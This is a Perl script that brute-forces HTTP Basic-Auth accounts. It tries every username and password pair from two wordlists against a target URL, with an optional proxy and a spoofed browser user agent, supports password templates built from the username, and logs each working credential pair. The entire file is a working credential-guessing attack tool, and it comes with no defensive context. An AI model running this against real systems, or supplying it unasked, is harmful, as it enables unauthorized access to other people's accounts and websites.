#!/usr/bin/perl
#
# 2001mei@websec.org
# brute force basic-auth protected
# http-acounts
#
###################################
use LWP;
use Getopt::Std;
use HTTP::Request::Common;
use HTTP::Response;
use MIME::Base64;
use vars qw($opt_a $opt_u $opt_p $opt_l $opt_v);
getopts("a:u:p:l:v:");
## vardecs
##
my $adress = $opt_a;
my $userfile = $opt_u;
my $passfile = $opt_p;
my $logfile = $opt_l;
my $proxy = $opt_v;
my %BASEPASS;
## check that
##
if (!$adress || !$userfile || !$passfile)
{
print "\nusage: $0 -a [URL]\n\t-u [userFile]\n\t-p [passfile]\n\t-l [logfile]\n\t-p [proxy]\n\n";
exit 11;
}
## resultfile
if ($logfile ne '')
{
open (RF, "> $logfile") || die "\ncant open $logfile !?!\n";
print RF "$adress:\n";
}
open(UF, "< $userfile") || die "\ncant open $userfile\n";
while (<UF>)
{
my $uid = $_;
##
open(PF, "< $passfile") || die "\ncant open $passfile\n";
##
while (<PF>)
{
my $pwd = $_;
my $user_agent = new LWP::UserAgent;
$user_agent->agent("Mozilla/4.0(compatible;MSIE 6.0;Windows NT 5.0)");
if ($proxy ne '')
{
$user_agent->proxy('http', $proxy) if($adress =~ /^http:\/\/.*$/);
$user_agent->proxy('https', $proxy) if($adress =~ /^https:\/\/.*$/);
}
$uid =~ s/[\n\r]//g;
$pwd =~ s/[\n\r]//g;
$pwd = &special($uid,$pwd);
my $response = $user_agent->request(GET "$adress", Authorization => "Basic ".encode_base64("$uid:$pwd"));
if ($response->is_success)
{
print "$uid:$pwd *** WORKING *** (",$response->code(),")\n";
print RF "$uid:$pwd *** WORKING *** (",$response->code(),")\n" if ($logfile ne '');
}
else
{
print "$uid:$pwd (",$response->code(),")\n";
print RF "$uid:$pwd (",$response->code(),")\n" if ($logfile ne '');
}
}
close(PF);
}
close (UF);
close (RF);
### sub special (pwd,uid)
### returns pwd
sub special
{
my $u = shift;
my $p = shift;
## check for %%UID%% in password
##
$p =~ s/%%UID%%/$u/ if($p =~ /%%UID%%/);
## check for %%UIDREV%% in password
##
if ($p =~ /%%UIDREV%%/)
{
my $tmp = "";
my $c = 0;
for ($c=length($u);$c>=0;$c--)
{
$tmp .= substr($u,$c,1);
}
$p =~ s/%%UIDREV%%/$tmp/;
}
## done
##
return $p;
}